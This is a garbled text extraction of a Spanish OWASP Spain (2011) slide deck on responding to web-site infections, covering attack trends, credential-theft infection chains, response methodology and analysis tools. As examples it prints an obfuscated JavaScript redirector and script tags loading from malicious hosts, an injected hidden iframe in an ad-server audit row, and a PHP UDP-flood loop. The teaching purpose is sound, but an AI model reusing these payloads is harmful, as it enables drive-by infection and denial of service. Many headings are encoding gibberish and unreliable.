Respuesta a incidentes en infecciones web - OWASP€¦ · 4/26/11 1 o 2 Respuesta a incidentes en...

4/26/11

1

¿ Comida o Amenaza ?

2

Respuesta a incidentes en infecciones web

Carles Fragoso Mariscal VII OWASP Spain Chapter Meeting ! Barcelona, 15 de Abril del 2011

Organiza: Patrocina: Colabora:

4/26/11

2

!"

–  Departament de Governació –  Secretaria de Telecomunicacions i Societat de la Informació –  Departament d’Interior –  Departament d’Innovació, Universitats i Empresa –  Centre de Telecomunicacions i Tecnologies de la Informació de

la Generalitat de Catalunya

•  Agència ACC1Ó

•  Consorci Administració Oberta de Catalunya

•  Ajuntament de Reus

•  Consell de Cambres de Comerç de Catalunya

•  e-la Caixa

•  Fundació Barcelona Digital

•  Universitat Rovira i Virgili

#$%&'()*%"+,-.+/0"

1234$235'"'")%()&2%523"2%")%62(()7%23"829"

1.  Contexto 2.  Tendencias de ataque 3.  Respuesta a Incidentes 4.  Conclusiones

4/26/11

3

1234$235'"'")%()&2%523"2%")%62(()7%23"829"

1.  Contexto 2.  Tendencias de ataque 3.  Respuesta a Incidentes 4.  Conclusiones

¿En qué tienda…

entrarías?

Perico

Drupal

Lupita

PHPNuke

Jorgito

Joomla

La Esteban

CMS

4/26/11

4

+7%52:57;"/<2%523"

•  Contenidos –  Propietario de los contenidos/información/marca –  Operadores/Usuarios de generación/administración de contenidos –  Usuarios/visitantes

•  Plataforma tecnológica

–  Administradores/operadores de la plataforma –  Proveedores de hosting/housing/cloud

•  Infraestructura, servicio, aplicación"

–  Empresas de desarrollo o integración –  Proveedores de contenidos terceros (ads, widgets!)

•  Seguridad –  Proveedores de listas de reputación –  Fabricantes de detección/contención de código malicioso –  Proveedores de auditoria/revisión de aplicaciones/código ¿ Responsabilidades ?

="

¿Qué comprarías

4/26/11

5

+7%52:57;"+)92>(>)?2%"

•  Los delincuentes y mafias de toda la vida se han pasado a la Internet motivados por: –  Incremento del uso por parte de los usuarios –  Vulnerabilidad de los sistemas –  Facilidad y “anonimato” a la hora de realizar acciones remotamente –  “Vacío” o lentitud en el ámbito legal-judicial

•  Estos han motivado la creación de toda una colección de software malicioso y servicios pensados para el cibercrimen –  Código malicioso para múltiples entornos (escritorio, web...) –  Paneles de control y administración de sistemas infectados

•  Las nuevas ‘armas digitales’ permiten realizar: –  Robo de credenciales, datos bancarios y personales, etc. –  Envío de correo basura –  Ataques de denegación de servicio

10

•  Bla

ISP de cibercrim

4/26/11

6

•  Adrenaline Pack •  Eleonore •  LuckySploit •  Fragus •  ElFiesta •  Napoleon Sploit •  Siberia •  Unique Pack •  JustExploit •  Sploit25 •  Phoenix Zeus •  Liberty •  Neon •  ZoPAck

Listado de “Exploit Packs”

4/26/11

7

•  BlackEnergy •  Kraken •  Waledac/Storm/Nuwar •  Srizbi •  Gumblar •  Sinowal/Torpig •  Ozdok •  Pushdo •  Zeus •  Koobface •  Spyeye •  Oficla/Sasfis •  Mariposa

13

Lista de familias de código malicioso

1234$235'"'")%()&2%523"2%")%62(()7%23"829"

1.  Contexto 2.  Tendencias 3.  Respuesta a Incidentes 4.  Conclusiones

4/26/11

8

@>79'9)A)&'&"&2"B)3$'A)C'()*%"829")%62(5'&'"

Fuente: Dasient Smartweb Security

www.piltrafilla.net

¡¡Reputación!!!

4/26/11

9

DE"

¡Infección!

¿Cómo nos… atacan?

4/26/11

10

02%&2%()'3;"+*&)<7"?'A)()737"

•  Punto de inserción –  Código fuente –  Ficheros de inclusión –  Entradas en base de datos

•  Formato –  Scripts (javascript) –  Marcos (iframe) –  Objetos (java, flash, PDF")

•  Técnicas antiforenses –  Ofuscación de código –  Detección de crawlers y IPs de CERT/LEO –  Detección de herramientas forenses

+*&)<7"?'A)()737"2%"F(G2>7"'%2:'&7"

HI"

</div> </div> </div> <script src="http://nt010.cn/E/J.JS"></script><script src='http://nt004.cn/E/J.JS'></script></body> </html> <html><body><script>function decoder(){var gfh=new Array(213,57,39,219,247,55,122,92,13,198,41,6,217,113,106,222,203,43,9,180,77,250,123,222,235,119,203,90,81,168);var scp=28;for(;scp>=1;){gfh[scp]=((((~gfh[scp])&0xff)>>7)|((((~gfh[scp])&0xff)<<1)&0xff))^gfh[0];scp--;}var scp=3;while(scp<=28){gfh[scp]=((((~gfh[scp])&0xff)^gfh[2])>>4)|(((((~gfh[scp])&0xff)^gfh[2])<<4)&0xff);scp++;}var scp=1;do{if(scp>27)break;gfh[scp]=((((((-gfh[scp])&0xff)<<7)&0xff)|(((-gfh[scp])&0xff)>>1))-234)&0xff;scp++;}while(true);return String.fromCharCode(gfh[1],gfh[2],gfh[3],gfh[10],gfh[14],gfh[16],gfh[18],gfh[20],gfh[21],gfh[23],gfh[24],gfh[26],gfh[27],gfh[28]);}window.location="/E/J.JS?"+decoder();</script><br><br><center><h3><B7><C3><CE><CA><B1><BE><D2><B3><C3><E6><A3><AC><C4><FA><B5><C4><E4><AF><C0><C0><C6><F7><D0><E8><D2><AA><D6><A7><B3><D6>JavaScript</h3></center></body></html>

4/26/11

11

+*&)<7"?'A)()737"2%"2%5>'&'"9'32"&2"&'573"

mysql> select * from ox_audit where date_sub(’YYYY-MM-DD', interval 1 day) <= updated; | auditid | actionid | context | contextid | parentid | details | userid | username | usertype | updated | account_id | advertiser_account_id | website_account_id | | 1234 | 2 | banners | 123| NULL | a:3:{s:6:"append";a:2:{s:3:"was";s:0:"";s:2:"is";s:137:"<iframe src="http://A.B.C.D/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>";}s:8:"key_desc";s:36:”CAMPAIGN NAME";s:10:"campaignid";s:3:"168";} | 1 | user | 0 | YYYY-MM-DD HH:MM:SS | 1 | 12 | NULL |

02%&2%()'3;"/9$37"

•  Distribución de código malicioso •  Denegación de servicio •  Envío de correo basura •  Redirección a contenidos: phishing, venta de viagra"

4/26/11

12

J>22%-G2AA;"K7-"LK@"M77&2>"N)%52>6'(2O"

J>22%-G2AA;"K7-"LK@"M77&2>"N(*&)<7O"

for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n"; echo '<br><br>

4/26/11

13

-2%&07;",%BP7"&2"(7>>27"9'3$>'"Q"4G)3G)%<"

02%&2%()'3;"R2(57>"&2"'5'S$2"

•  Compromiso masivo mediante vulnerabilidades –  Ej: IIS/ASP (Lizamoon), diversos CMS"

•  Inserción de código malicioso en anuncios –  Ej: Software anuncios (OpenX), redes de terceros"

•  Robo de credenciales FTP/HTTP –  Ej: Botnet Bredolab

4/26/11

14

HE"

.%62(()*%"!"##$%&"T42%U"

4/26/11

15

'()*+,-"V)5"

J2357>"!+-#$-.

/0,&0,#1"V)5"

23%,)-"&2")%62(()*%"

+*&)<7"?'A)()737.

!+-.

12(7A2(57>"&2"

(>2&2%()'A23.

.%62(()*%"47>">797"&2"(>2&2%()'A23;"@)2C'3"

.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"+7%52:57"

Atacante Víctimas

Administrador

Propietario

4/26/11

16

Alojamiento de crimeware

1

W)5"&2"(7&)"'()*+,-.

J2357>"4+-#$-.

12(7A2(57>"(>2&2%()'A3.

Engaño al administrador con técnicas de ingeniería social

3

Publicar contenidos de phishing o de ingeniería social

2

W)5"&2"423('"

2A2(5>X%)('.

Mensajería Correo electrónico

Redes sociales

.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"@>24'>'()*%!

J2357>"4+-#$-.

12(7A2(57>"(>2&2%()'A3.

Administrador infectado con código malicioso bot

4

Gestor de bots y recepción de credenciales

5

Y75.

.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;",%<'Z7"

4/26/11

17

12(7A2(57>"(>2&2%()'A23.

Infección de páginas web con credenciales robadas

7

Y75.

.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;".%62(()*%"

-(>)45".%62(()*%.

Procesado de credenciales y preparación infección

6

Entrega de código infectado a los usuarios

8

'()*+,-"V)5.

J2357>"4+-#$-.

Accesos legítimos al servidor web

7 Infección y control de nuevos sistemas

9

Y75.

.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;".%62(()*%"

4/26/11

18

Y75.

J2357>"4+-#$-.

Administración de sistemas infectados

10

.%62(()*%"?'3)B'"47>">797"&2"(>2&2%()'A23;"+7%5>7A"

Y75.

1234$235'"'")%()&2%523"2%")%62(()7%23"829"


4/26/11

19

1234$235'"'")%()&2%523"["'%\A)3)3"67>2%32"

"#$$%&'#()%*!+,-'./! 0$/1#*/*!

•  Gestores •  Analistas •  Forenses •  Consultores

•  Kit de respuesta •  Intercepción •  Entorno de pruebas •  Herramientas forenses

•  Recogida de evidencias •  Análisis de información •  Ingeniería inversa •  Análisis forense •  Investigación

#A$]7"&2">234$235'"'")%()&2%523"

!="

2#*.-#*)%!

$#&/)%!

2#*.-#*)%!

.$#*#(1'%3!

45,-'*'1'6(!

7!.$#*#$8%1'6(!

4(93'*'*!7!

'(8#*:;%1'6(! <(=/$&#*!

4/26/11

20

>#)#11'6(!

7!)$'%?#!<(=/$&#!

+$$%5'1%1'6(!

2#1-.#$%1'6(!

4(@3'*'!

A#;-'&'#()/!

45,-'*'1'6(!7!

.$#%(93'*'*!

B/()#(1'6(!

C/:D1%1'6(!

1234$235'"'")%()&2%523"

•  Preparación –  Entorno “sandbox” con las herramientas adecuadas y con

conectividad limitada y de forma anónima (proxies) –  Kit de respuesta presencial (portátil, sonda, maletín") –  Procedimiento de recogida de información en clientes y servidores

•  Respuesta –  Revisión estática/dinámica desde entorno sandbox con

herramientas de control del navegador (protección) –  Scripts de revisión de servidor para identificar elementos infectados –  Contención/monitorización mediante firmas WAF/IPS –  Recogida de información preliminar de fuentes de inteligencia –  Procedimiento de limpieza de máquinas infectadas –  Coordinación/actuación sobre dominios y IPs de terceros

•  Análisis –  Análisis dinámico con herramientas tipo sandbox –  Ingeniería inversa de código malicioso y otros artefactos

1234$235'"'")%()&2%523;"^257&7A7<P'"

4/26/11

21

B/$)%=-#;/*!

<()#$(#)!

+()/$(/!5#!'(8#*:;%1'6(!+()/$(/!!

5#!.$-#E%*!

+()/$(/!5#!

8'$)-%3')F%1'6(!

2/-)#$*!!

8'$)-%3#*!

1234$235'"'".%()&2%523;"_2>>'?)2%5'3"&2"'%\A)3)3"

•  Análisis dinámico –  Wepawet

http://wepawet.iseclab.org/

–  Anubis http://anubis.iseclab.org/

•  Deofuscación –  Jsunpack

http://jsunpack.jeek.org/

–  Malzilla http://malzilla.sourceforge.net/

•  Revisión de código malicioso –  Virustotal –  Team Cymru Malware Hash Database

•  Otros –  Firefox plugins: Adblock, Noscript, StopAutoplay, Flashblock –  Wireshark/Tshark ! Sysinternal Tools –  Fiddler / FiddlerCap

http://www.fiddler2.com/fiddler2/

–  Fireshark http://fireshark.org/

`H"

4/26/11

22

_2>>'?)2%5'3;"#)&&A2>"N5$!.6$!711$%O"

_2>>'?)2%5'3;"#)&&A2>+'4"N3")-7%"6+%O"

4/26/11

23

#)>23G'>V;"a29"/%'A[3)3""

`b"

Q2 2010: Infection Library .%67>?'()*%"&2")%52A)<2%()';"K'3)2%5".%62(c7%"d)9>'>["

4/26/11

24

www.maliciousnetworks.org

.%67>?'()*%"&2")%52A)<2%()';"#)%&)%<"17<$,"e2587>V3"

1234$235'"'".%()&2%523;".%67>?'()*%"&2")%52A)<2%()'"

•  ABUSE.CH Malware Database http://amada.abuse.ch/

•  Malc0de Database http://malc0de.com/database/index.php

•  Malware Domain List http://www.malwaredomainlist.com/mdl.php

•  Host Exploit http://hostexploit.com/

•  Malicious Networks http://www.maliciousnetworks.org

•  Google Safebrowsing http://www.google.com/safebrowsing/diagnostic?site=dominio.tld

`="

4/26/11

25

1234$235'"'")%()&2%523"2%")%62(()7%23"829"


Conclusiones

4/26/11

26

+7%(A$3)7%23"

•  Las infecciones de tipo web se están incrementado exponencialmente •  Los navegadores web siguen contando con vulnerabilidades

sobretodo en los complementos de terceros •  Los servidores web siguen siendo expuestos debido a

vulnerabilidades en los CMS y por el robo de credenciales de sus operadores/administradores

•  Los sistemas de reputación están ayudando ante incidentes masivos pero no son una bala de plata

•  La sofisticación del código malicioso web va en aumento para evitar su detección y análisis

bD"

52

1=$%;/*/G1#*'1%)H1%)!!!888f(23)('5f('5"G1#*'1%)

Respuesta a incidentes en infecciones web - OWASP€¦ · 4/26/11 1 o 2 Respuesta a incidentes en...

Documents

Transcript of Respuesta a incidentes en infecciones web - OWASP€¦ · 4/26/11 1 o 2 Respuesta a incidentes en...